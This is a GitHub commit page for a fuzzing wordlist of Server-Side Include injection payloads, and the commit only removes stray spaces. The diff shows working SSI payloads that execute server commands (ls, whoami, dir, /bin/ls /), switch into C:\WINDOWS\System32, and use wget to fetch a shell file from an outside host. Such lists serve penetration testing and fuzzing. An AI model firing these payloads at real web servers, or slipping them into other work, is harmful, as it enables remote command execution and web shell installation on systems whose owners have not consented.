Skip to content

Commit

Permalink
removed offending spaces
Browse files Browse the repository at this point in the history
  • Loading branch information
jhaddix committed Mar 12, 2013
1 parent 951ea38 commit 0e3255e
Showing 1 changed file with 5 additions and 5 deletions.
10 changes: 5 additions & 5 deletions Fuzzing/JHADDIX_SSI_Injection.txt
Original file line number Diff line number Diff line change
@@ -1,12 +1,12 @@
<pre>< !--#exec cmd="ls" --> </pre>
<pre><!--#exec cmd="ls" --></pre>
<pre><!--#echo var="DATE_LOCAL" --> </pre>
<pre><!--#exec cmd="whoami"--></pre>
<pre>< !--#exec cmd="dir" --></pre>
< !--#exec cmd="ls" -->
<pre><!--#exec cmd="dir" --></pre>
<!--#exec cmd="ls" -->
<!--#exec cmd="wget http://website.com/dir/shell.txt" -->
<!--#exec cmd="/bin/ls /" -->
< !--#exec cmd="dir" -->
< !--#exec cmd="cd C:\WINDOWS\System32">
<!--#exec cmd="dir" -->
<!--#exec cmd="cd C:\WINDOWS\System32">
<!--#config errmsg="File not found, informs users and password"-->
<!--#echo var="DOCUMENT_NAME" -->
<!--#echo var="DOCUMENT_URI" -->
Expand Down

0 comments on commit 0e3255e

Please sign in to comment.